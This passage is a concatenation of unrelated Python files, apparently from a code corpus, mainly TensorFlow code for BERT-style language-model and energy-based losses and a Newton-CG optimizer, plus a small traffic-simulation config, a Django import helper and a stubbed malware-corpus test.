label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
else:
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(input_ori_ids),
)
per_example_loss *= sampled_binary_mask
tf.logging.info("**** normal mlm loss ****")
return (loss, per_example_loss, logits, sampled_binary_mask)
def denoise_autoencoder(config, input_tensor, output_weights,
input_mask, input_ori_ids, input_ids,
sampled_binary_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
# if config.get('ln_type', 'postln') == 'preln':
# input_tensor = input_tensor
# elif config.get('ln_type', 'postln') == 'postln':
# input_tensor = bert_modules.layer_norm(input_tensor)
# else:
# input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
if kargs.get("discriminator_mode", None) == "gan":
pass
elif kargs.get("discriminator_mode", "ce_loss") == "ce_loss":
input_tensor_norm = normalizing(input_tensor, 2) # batch L emb
output_weights_norm = normalizing(output_weights, 1) # batch emb
logits = tf.einsum("abd,cd->abc", input_tensor_norm, output_weights_norm)
temperature = config.get("temperature", 100.0)
			log_probs = tf.nn.log_softmax(logits*temperature, axis=-1)
tf.logging.info("== ce loss with temperature: %s =="%(str(temperature)))
rec_sent = tf.squeeze(tf.argmax(logits, 2))
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len]
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("discriminator_mode", "ce_loss") == "normal_ce_loss":
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
tf.logging.info("== normal ce loss ==")
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.einsum("abd,cd->abc", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("discriminator_mode", "ce_loss") == "circle_loss":
input_tensor_norm = normalizing(input_tensor, 2) # batch L emb
output_weights_norm = normalizing(output_weights, 1) # batch emb
logits = tf.einsum("abd,cd->abc", input_tensor_norm, output_weights_norm)
gamma = kargs.get("circle_loss_gamma", 64)
margin = kargs.get("circle_loss_margin", 0.25)
tf.logging.info("== apply sparse circle loss, gamma: %s, marin: %s=="%(str(gamma), str(margin)))
# [batch_size x seq_length]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size x seq_length, vocab_size]
logits_all = tf.reshape(logits, [-1, config.vocab_size])
# [batch_size x seq_length,zaa 1]
per_example_loss, logits_mask = loss_utils.sparse_circle_loss_v1(
label_ids,
logits_all,
n_class=config.vocab_size,
margin=margin,
gamma=gamma)
if kargs.get("loss_converage", "local") == "local":
label_weights = tf.reshape(sampled_binary_mask, [-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
elif kargs.get("loss_converage", "local") == "global":
all_label_weights = tf.reshape(tf.cast(input_mask, dtype=tf.float32), [-1])
numerator = tf.reduce_sum(all_label_weights * per_example_loss)
denominator = tf.reduce_sum(all_label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, logits, sampled_binary_mask)
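# Hedged sketch (illustrative only): the "ce_loss" branch of denoise_autoencoder scores each
# token with a temperature-scaled similarity between hidden states and the embedding table.
# A minimal stand-alone version, assuming `hidden` is [batch, seq, dim] and
# `embedding_table` is [vocab, dim], both already l2-normalized:
def _cosine_logits_sketch(hidden, embedding_table, temperature=100.0):
	# [batch, seq, vocab] similarity scores, sharpened by the temperature
	logits = tf.einsum("abd,cd->abc", hidden, embedding_table)
	return tf.nn.log_softmax(logits * temperature, axis=-1)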
def emb_score(config, input_tensor, input_ids,
output_weights,
input_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
scope = kargs.get('scope', None)
if scope:
lm_scope = scope + '/' + 'cls/predictions'
else:
lm_scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(lm_scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(lm_scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
if kargs.get("energy_pooling", "mi") == "mi":
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
tf.logging.info("****** mi using mlm transform *******")
elif kargs.get("energy_pooling", "mi") == "cls":
with tf.variable_scope("transform_ebm"):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token. We assume that this has been pre-trained
first_token_tensor = tf.squeeze(input_tensor[:, 0:1, :], axis=1)
input_tensor = tf.layers.dense(
first_token_tensor,
config.hidden_size,
activation=tf.tanh, #bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(config.initializer_range))
tf.logging.info("****** using cls pooling *******")
else:
with tf.variable_scope("transform_ebm"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=tf.tanh, #bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
tf.logging.info("****** using other pooling transform *******")
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
if scope:
ebm_scope = scope + '/' + 'ebm/predictions'
else:
ebm_scope = 'ebm/predictions'
tf.logging.info("**** ebm generator scope **** %s", str(ebm_scope))
print(input_tensor.get_shape(), "==input_tensor shape==")
with tf.variable_scope(ebm_scope, reuse=tf.AUTO_REUSE):
		# assume the whole model is self-normalizing
if kargs.get("normalized_constant", "constant") == 'zero_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.zeros_initializer())
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
tf.logging.info("****** zero_constant logz *******")
elif kargs.get("normalized_constant", "constant") == 'one_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.ones_initializer())
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'constant_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*200.0, tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'log9_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*np.log(9.0), tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'logv_constant':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.ones((config.max_position_embeddings))*np.log(config.vocab_size), tf.float32))
tf.logging.info("****** one_constant logz *******")
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
elif kargs.get("normalized_constant", "constant") == 'logv_constant_ln':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[],
initializer=tf.constant_initializer(np.log(config.vocab_size), tf.float32))
input_normalized_constant = normalized_constant
elif kargs.get("normalized_constant", "length_linear") == 'length_linear':
normalized_constant = tf.get_variable(
"ebm_normalized_constant",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.arange((config.max_position_embeddings))+1, tf.float32),
trainable=False)
scale_weights = tf.get_variable(
"ebm_normalized_constant_scale",
shape=[config.max_position_embeddings],
initializer=tf.constant_initializer(np.log(config.vocab_size)*np.ones((config.max_position_embeddings)), dtype=tf.float32),
trainable=True)
scale_bias = tf.get_variable(
"ebm_normalized_constant_bias",
shape=[config.max_position_embeddings],
initializer=tf.zeros_initializer(),
trainable=True)
tf.logging.info("****** length linear logz *******")
# normalized_constant = scale_bias + scale_weights * tf.pow(normalized_constant, 2)
valid_seq_length = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32) # batch_size
onehot_length_ids = tf.one_hot(valid_seq_length, config.max_position_embeddings)
length_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
length_scale_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), scale_weights)
length_bias_part = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), scale_bias)
input_normalized_constant = length_part*length_scale_part + length_bias_part
# input_normalized_constant = tf.einsum("ab,b->a", tf.cast(onehot_length_ids, tf.float32), normalized_constant)
# f_input_mask = tf.cast(tf.expand_dims(input_mask, axis=-1), tf.float32)
if kargs.get("energy_pooling", "mi") == "mean_pooling":
tf.logging.info("==apply mean pooling to get hidden states projections==")
			# for an input token sequence <start> a b c, we only compute the energy
			# over a, b, c; the <start> token does not contribute to the final
			# energy function
# batch x dim
pool_features = tf.einsum("abc,ab->ac", input_tensor[:, 1:], tf.cast(input_mask[:, 1:], tf.float32))
pool_features /= (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=1, keepdims=True))
# tf.reduce_sum(input_tensor*f_input_mask, axis=1) #/ (1e-10+tf.reduce_sum(f_input_mask, axis=1))
print(pool_features.get_shape(), "===pool_features shape===")
elif kargs.get("energy_pooling", "mi") == "mi":
tf.logging.info("==apply mi to get hidden states projections==")
# input_tensor_norm = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.pow(input_tensor, 2), axis=-1))+1e-20, axis=-1)
# input_tensor = input_tensor / tf.stop_gradient(input_tensor_norm)
# output_weights_norm = tf.expand_dims(tf.sqrt(tf.reduce_sum(tf.pow(output_weights, 2), axis=-1))+1e-20, axis=-1)
# output_weights = output_weights / tf.stop_gradient(output_weights_norm)
# we calculate cosine distance to make mi bounded by [-1, 1]
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights) # batch x seq x vocab
logits = tf.nn.bias_add(logits, output_bias)
input_id_shape = bert_utils.get_shape_list(input_ids, [2,3])
if len(input_id_shape) == 2:
onehot_input_ids = tf.cast(tf.one_hot(tf.cast(input_ids, tf.int32), config.vocab_size), tf.float32) # batch x seq x vocab
input_ori_ids = tf.cast(onehot_input_ids, tf.float32)
print("==input ori ids shape== 2-dim", input_ori_ids.get_shape())
else:
input_ori_ids = tf.cast(input_ids, tf.float32)
print("==input ori ids shape== 3-dim", input_ori_ids.get_shape())
logits = tf.einsum("abd,abd->ab", logits, input_ori_ids)
print(logits.get_shape(), "==pooled logits shape==")
# with l2-normalize, we can bound logits to 1
pool_features = tf.reduce_sum(logits[:, 1:]*tf.cast(input_mask[:, 1:], tf.float32), axis=1) #/ (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=1))
pool_features = tf.expand_dims(pool_features, axis=-1)
print(pool_features.get_shape(), "==pooled feature shape==")
if kargs.get("softplus_features", False):
				# softplus(-x): as pooled_features goes to +infinity the output converges to 0,
				# and as pooled_features goes to -infinity the output grows without bound
pool_features = tf.nn.softplus(-pool_features)
tf.logging.info("****** apply softplus transformation for pooled_features *******")
elif kargs.get("energy_pooling", "mi") == "cls":
with tf.variable_scope("transform"):
pool_features = tf.layers.dense(
input_tensor,
units=1,
use_bias=False,
activation=None
)
tf.logging.info("****** apply linear transformation for pooled_features *******")
# batch_size x hidden_dims
if kargs.get('transform', True):
if kargs.get("transformer_activation", "none") == 'softplus':
with tf.variable_scope("transform"):
ebm_scalar = tf.layers.dense(
pool_features,
units=1,
use_bias=True,
activation=tf.nn.softplus # mask scalar to [0,inifite]
)
tf.logging.info("****** apply softplus *******")
elif kargs.get("transformer_activation", "none") == 'linear':
tf.logging.info("****** apply linear projection *******")
with tf.variable_scope("transform"):
ebm_scalar = tf.layers.dense(
pool_features,
units=1,
use_bias=True,
activation=None # mask scalar to [0,inifite]
)
else:
with tf.variable_scope("transform"):
feature_shape = bert_utils.get_shape_list(pool_features, expected_rank=[1,2])
pool_features = tf.layers.dense(
pool_features,
units=feature_shape[-1],
activation=tf.nn.relu,
)
output_weights = tf.get_variable(
"output_weights", [config.max_position_embeddings, feature_shape[-1]],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [config.max_position_embeddings],
initializer=tf.constant_initializer(-np.log(np.arange(config.max_position_embeddings).astype(np.float32)+1.0), dtype=tf.float32)
)
# batch x max_position_embeddings
ebm_scalar_pos = tf.nn.relu(tf.matmul(pool_features, output_weights, transpose_b=True)) + output_bias
pos_tensor = tf.cast(tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1), tf.int32)
onehot_pos = tf.cast(tf.one_hot(tf.cast(pos_tensor, tf.int32), config.max_position_embeddings), tf.float32) # batch x seq x vocab
ebm_scalar = tf.einsum("ab,ab->a", ebm_scalar_pos, onehot_pos)
ebm_scalar = tf.expand_dims(ebm_scalar, axis=-1)
tf.logging.info("****** apply linear projection *******")
print("===ebm_scalar====", ebm_scalar.get_shape())
ebm_scalar = tf.squeeze(ebm_scalar, axis=-1)
print("===ebm_scalar====", ebm_scalar.get_shape())
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
# if kargs.get("energy_pooling", "mi") == "mean_pooling":
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
else:
ebm_scalar = tf.squeeze(pool_features, axis=-1)
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
if not kargs.get("prob_ln", False):
tf.logging.info("****** sum of plogprob as sentence probability *******")
# ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
else:
ebm_scalar /= (1e-10+tf.reduce_sum(tf.cast(input_mask[:, 1:], tf.float32), axis=-1))
tf.logging.info("****** sum of plogprob with length normalization as sentence probability *******")
print("===ebm_scalar====", ebm_scalar.get_shape())
print("===input_normalized_constant====", input_normalized_constant.get_shape())
# original ebm log-likelihood:
# log(exp(-E(x))/Z) = -E(x) - log(Z)
# here we use bert encoder of pooled hidden states as energy function which need to minus when apply to
# actual energy function
if not kargs.get("use_tpu", False):
tf.summary.scalar('ebm_scalar',
tf.reduce_mean(ebm_scalar))
if kargs.get("logz_mode", "default") == 'default':
tf.logging.info("****** default logz *******")
logits = -ebm_scalar - input_normalized_constant - tf.log(1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
elif kargs.get("logz_mode", "default") == 'standard':
logits = ebm_scalar - input_normalized_constant
tf.logging.info("****** standard logz *******")
elif kargs.get("logz_mode", "default") == 'standard_minus':
tf.logging.info("****** minus standard logz *******")
logits = -ebm_scalar - input_normalized_constant
elif kargs.get("logz_mode", "default") == 'constant':
logits = -ebm_scalar - tf.log(1e-10+tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1))
tf.logging.info("****** constant logz *******")
elif kargs.get("logz_mode", "self_normalizing") == 'self_normalizing':
logits = -ebm_scalar
tf.logging.info("****** self_normalizing *******")
elif kargs.get("logz_mode", "none") == 'none':
logits = ebm_scalar
tf.logging.info("****** none logz *******")
else:
tf.logging.info("****** linear logz *******")
logits = ebm_scalar - input_normalized_constant * tf.reduce_sum(tf.cast(input_mask, tf.float32), axis=-1)
print("=ebm logits shape==", logits.get_shape())
return logits
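# Hedged sketch (illustrative only): emb_score combines a per-sentence energy with a
# length-indexed log-partition estimate, roughly log p(x) ~ -E(x) - logZ(len(x)).
# A minimal stand-alone version of the length lookup used above, assuming `logz_table`
# has shape [max_position_embeddings] and `input_mask` is [batch, seq]:
def _length_indexed_logz_sketch(logz_table, input_mask, max_position_embeddings):
	valid_len = tf.cast(tf.reduce_sum(input_mask, axis=-1), tf.int32)  # [batch]
	onehot_len = tf.one_hot(valid_len, max_position_embeddings)  # [batch, max_position_embeddings]
	return tf.einsum("ab,b->a", tf.cast(onehot_len, tf.float32), logz_table)  # [batch]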
|
471190
|
import os
from polyswarmclient.corpus import DownloadToFileSystemCorpus
def test_download_truth_artifact():
pass
# d = DownloadToFileSystemCorpus()
# t = d.download_truth()
# assert os.path.exists(d.truth_db_pth)
def test_download_raw_artifacts():
pass
# d = DownloadToFileSystemCorpus()
# d.download_and_unpack()
# assert d.get_malicious_file_list()
# assert d.get_benign_file_list()
# d.generate_truth()
# assert os.path.exists(d.truth_db_pth)
|
471238
|
from simulation.speedLimits import *
from simulation.trafficGenerators import *
maxFps= 40
size = width, heigth = 1280, 720
# in milliseconds
updateFrame = 500
seed = None
lanes = 3
length = 300
maxSpeed = 5
speedLimits = [ SpeedLimit(range=((150,0),(300,0)), limit=0, ticks=0), SpeedLimit(range=((220, 2), (300,2)), limit=0, ticks=0) ]
trafficGenerator = SimpleTrafficGenerator(2)
slowDownProbability, laneChangeProbability = 0.15, 0.2
|
471272
|
import importlib
from admino.serializers import FormSerializer
from django.forms import BaseForm
from django.utils.functional import Promise
from django.utils.encoding import force_unicode
def import_from_string(module_path):
"""
Attempt to import a class from a string representation.
"""
    try:
        parts = module_path.split('.')
        class_name = parts[-1]
        module = importlib.import_module('.'.join(parts[:-1]))
        return getattr(module, class_name)
    except (ImportError, AttributeError) as e:
        msg = 'Could not import "%s" for Admino setting: %s' % (module_path, e)
        raise ImportError(msg)
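# Hedged usage sketch ("myapp.forms.LoginForm" is a hypothetical dotted path):
#   FormClass = import_from_string("myapp.forms.LoginForm")
#   form = FormClass()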
|
471284
|
import pdb
import tensorflow as tf
import time
import numpy as np
import os
import math
from utilities import predict
def Rop(f, weights, v):
"""Implementation of R operator
Args:
f: any function of weights
weights: list of tensors.
v: vector for right multiplication
Returns:
		Jv: Jacobian-vector product, with the same structure as
			the outputs of f
"""
if type(f) == list:
u = [tf.zeros_like(ff) for ff in f]
else:
u = tf.zeros_like(f) # dummy variable
g = tf.gradients(ys=f, xs=weights, grad_ys=u)
return tf.gradients(ys=g, xs=u, grad_ys=v)
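# Note (added for clarity): this is the standard double-backprop trick for forward-mode
# products: g = J^T u is linear in the dummy variable u, so differentiating g w.r.t. u
# with upstream gradient v yields Jv without ever materializing the Jacobian J.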
def Gauss_Newton_vec(outputs, loss, weights, v):
"""Implements Gauss-Newton vector product.
Args:
loss: Loss function.
outputs: outputs of the last layer (pre-softmax).
weights: Weights, list of tensors.
v: vector to be multiplied with Gauss Newton matrix
Returns:
		J'BJv: Gauss-Newton vector product.
"""
# Validate the input
if type(weights) == list:
if len(v) != len(weights):
raise ValueError("weights and v must have the same length.")
grads_outputs = tf.gradients(ys=loss, xs=outputs)
BJv = Rop(grads_outputs, weights, v)
JBJv = tf.gradients(ys=outputs, xs=weights, grad_ys=BJv)
return JBJv
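# Hedged usage sketch (names are illustrative): for a model with parameter list `weights`,
# pre-softmax `outputs`, scalar `loss` and a vector `v` shaped like `weights`,
#   Gv = Gauss_Newton_vec(outputs, loss, weights, v)
# returns a list of tensors (one per weight tensor) to be fed to a CG solver.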
class newton_cg(object):
def __init__(self, config, sess, outputs, loss):
"""
		initialize operations and variables that will be used in the Newton method
args:
sess: tensorflow session
outputs: output of the neural network (pre-softmax layer)
loss: function to calculate loss
"""
super(newton_cg, self).__init__()
self.sess = sess
self.config = config
self.outputs = outputs
self.loss = loss
self.param = tf.compat.v1.trainable_variables()
self.CGiter = 0
FLOAT = tf.float32
model_weight = self.vectorize(self.param)
# initial variable used in CG
zeros = tf.zeros(model_weight.get_shape(), dtype=FLOAT)
self.r = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.v = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.s = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.g = tf.Variable(zeros, dtype=FLOAT, trainable=False)
# initial Gv, f for method minibatch
self.Gv = tf.Variable(zeros, dtype=FLOAT, trainable=False)
self.f = tf.Variable(0., dtype=FLOAT, trainable=False)
# rTr, cgtol and beta to be used in CG
self.rTr = tf.Variable(0., dtype=FLOAT, trainable=False)
self.cgtol = tf.Variable(0., dtype=FLOAT, trainable=False)
self.beta = tf.Variable(0., dtype=FLOAT, trainable=False)
# placeholder alpha, old_alpha and lambda
self.alpha = tf.compat.v1.placeholder(FLOAT, shape=[])
self.old_alpha = tf.compat.v1.placeholder(FLOAT, shape=[])
self._lambda = tf.compat.v1.placeholder(FLOAT, shape=[])
self.num_grad_segment = math.ceil(self.config.num_data/self.config.bsize)
self.num_Gv_segment = math.ceil(self.config.GNsize/self.config.bsize)
cal_loss, cal_lossgrad, cal_lossGv, \
add_reg_avg_loss, add_reg_avg_grad, add_reg_avg_Gv, \
zero_loss, zero_grad, zero_Gv = self._ops_in_minibatch()
# initial operations that will be used in minibatch and newton
self.cal_loss = cal_loss
self.cal_lossgrad = cal_lossgrad
self.cal_lossGv = cal_lossGv
self.add_reg_avg_loss = add_reg_avg_loss
self.add_reg_avg_grad = add_reg_avg_grad
self.add_reg_avg_Gv = add_reg_avg_Gv
self.zero_loss = zero_loss
self.zero_grad = zero_grad
self.zero_Gv = zero_Gv
self.CG, self.update_v = self._CG()
self.init_cg_vars = self._init_cg_vars()
self.update_gs = tf.tensordot(self.s, self.g, axes=1)
self.update_sGs = 0.5*tf.tensordot(self.s, -self.g-self.r-self._lambda*self.s, axes=1)
self.update_model = self._update_model()
self.gnorm = self.calc_norm(self.g)
def vectorize(self, tensors):
if isinstance(tensors, list) or isinstance(tensors, tuple):
vector = [tf.reshape(tensor, [-1]) for tensor in tensors]
return tf.concat(vector, 0)
else:
return tensors
def inverse_vectorize(self, vector, param):
if isinstance(vector, list):
return vector
else:
tensors = []
offset = 0
num_total_param = np.sum([np.prod(p.shape.as_list()) for p in param])
for p in param:
numel = np.prod(p.shape.as_list())
tensors.append(tf.reshape(vector[offset: offset+numel], p.shape))
offset += numel
assert offset == num_total_param
return tensors
def calc_norm(self, v):
# default: frobenius norm
if isinstance(v, list):
norm = 0.
for p in v:
norm = norm + tf.norm(tensor=p)**2
return norm**0.5
else:
return tf.norm(tensor=v)
def _ops_in_minibatch(self):
"""
Define operations that will be used in method minibatch
Vectorization is already a deep copy operation.
Before using newton method, loss needs to be summed over training samples
to make results consistent.
"""
def cal_loss():
return tf.compat.v1.assign(self.f, self.f + self.loss)
def cal_lossgrad():
update_f = tf.compat.v1.assign(self.f, self.f + self.loss)
grad = tf.gradients(ys=self.loss, xs=self.param)
grad = self.vectorize(grad)
update_grad = tf.compat.v1.assign(self.g, self.g + grad)
return tf.group(*[update_f, update_grad])
def cal_lossGv():
v = self.inverse_vectorize(self.v, self.param)
Gv = Gauss_Newton_vec(self.outputs, self.loss, self.param, v)
Gv = self.vectorize(Gv)
return tf.compat.v1.assign(self.Gv, self.Gv + Gv)
# add regularization term to loss, gradient and Gv and further average over batches
def add_reg_avg_loss():
model_weight = self.vectorize(self.param)
reg = (self.calc_norm(model_weight))**2
reg = 1.0/(2*self.config.C) * reg
return tf.compat.v1.assign(self.f, reg + self.f/self.config.num_data)
def add_reg_avg_lossgrad():
model_weight = self.vectorize(self.param)
reg_grad = model_weight/self.config.C
return tf.compat.v1.assign(self.g, reg_grad + self.g/self.config.num_data)
def add_reg_avg_lossGv():
return tf.compat.v1.assign(self.Gv, (self._lambda + 1/self.config.C)*self.v
+ self.Gv/self.config.GNsize)
# zero out loss, grad and Gv
def zero_loss():
return tf.compat.v1.assign(self.f, tf.zeros_like(self.f))
def zero_grad():
return tf.compat.v1.assign(self.g, tf.zeros_like(self.g))
def zero_Gv():
return tf.compat.v1.assign(self.Gv, tf.zeros_like(self.Gv))
return (cal_loss(), cal_lossgrad(), cal_lossGv(),
add_reg_avg_loss(), add_reg_avg_lossgrad(), add_reg_avg_lossGv(),
zero_loss(), zero_grad(), zero_Gv())
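	# Note (added for clarity): the ops above implement an accumulate-then-average pattern:
	# cal_loss / cal_lossgrad / cal_lossGv are run once per minibatch so that f, g and Gv
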